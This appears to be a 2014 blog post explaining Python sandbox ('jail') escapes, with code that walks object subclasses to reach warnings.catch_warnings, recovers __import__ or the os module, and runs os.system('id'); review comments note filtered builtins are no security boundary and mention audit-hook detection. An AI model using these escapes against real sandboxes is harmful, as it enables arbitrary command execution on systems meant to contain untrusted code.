Thursday, December 11, 2014

Python jailbreak

This is a very common method for escaping from a Python jail, i.e. an in-process sandbox that removes or filters builtins such as `__import__`.

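The key idea is to obtain the <warnings.catch_warnings> class from the subclass list of `object`. Everything reachable from that class (the `warnings` module, its builtins, and the modules it imports) is still intact even when the jail has stripped the caller's own namespace.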

# Enumerate every class currently derived from `object` in order to locate
# <class 'warnings.catch_warnings'>. `{}.__class__` is dict and its `__base__`
# is object, so the walk needs no name lookup and no builtin function.
# The index printed for a given class depends on the interpreter version and
# on which modules have already been imported.
for i, j in enumerate({}.__class__.__base__.__subclasses__()):
    print(i, j)

# Alternative: pick the class by `__name__` instead of by position, then
# instantiate it. The instance's `_module` attribute is followed to that
# module's `__builtins__` mapping, which still holds the real `__import__`.
# NOTE(review): this succeeds even if the jail emptied the caller's builtins,
# so in-process builtin stripping is not a security boundary. Untrusted code
# needs OS-level isolation (separate process, unprivileged user,
# seccomp/container) rather than a filtered namespace.
print([c for c in {}.__class__.__base__.__subclasses__()  if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os'))

# Index 59 is where warnings.catch_warnings sat in the author's interpreter.
# The position varies with the Python version and with the set of loaded
# modules, so the hard-coded value is specific to that environment.
# The three statements below differ only in the starting literal (tuple, list,
# dict): each reaches `object` through `__class__.__base__`, which is why
# blocklisting one spelling of the expression does not close the hole.
# os.system("id") only demonstrates that an arbitrary command runs.
w = ().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')
w.system("id")

w = [].__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')
w.system("id")

w = {}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')
w.system("id")

# Variant that neither instantiates the class nor touches `__builtins__`:
# it reads the globals of the class's `__init__` function, takes the
# `linecache` entry found there, and picks `os` out of that module's namespace.
# `func_globals` is the Python 2 attribute name, so these lines are
# Python 2-specific as written.
# NOTE(review): relies on the defining module importing linecache, and
# linecache importing os, at module level; true for the author's interpreter,
# verify for any other version.
w = ().__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]
w.system("id")

w = [].__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]
w.system("id")

w = {}.__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]
w.system("id")


# All of the above are equivalent to the plain import below; presumably this
# is the operation the jail was meant to block.
# Detection note: on Python 3.8+ an audit hook registered with
# sys.addaudithook receives the "os.system" event regardless of how the os
# module object was obtained, so the call can be logged at the runtime level
# instead of by filtering source text.
import os
os.system("id")


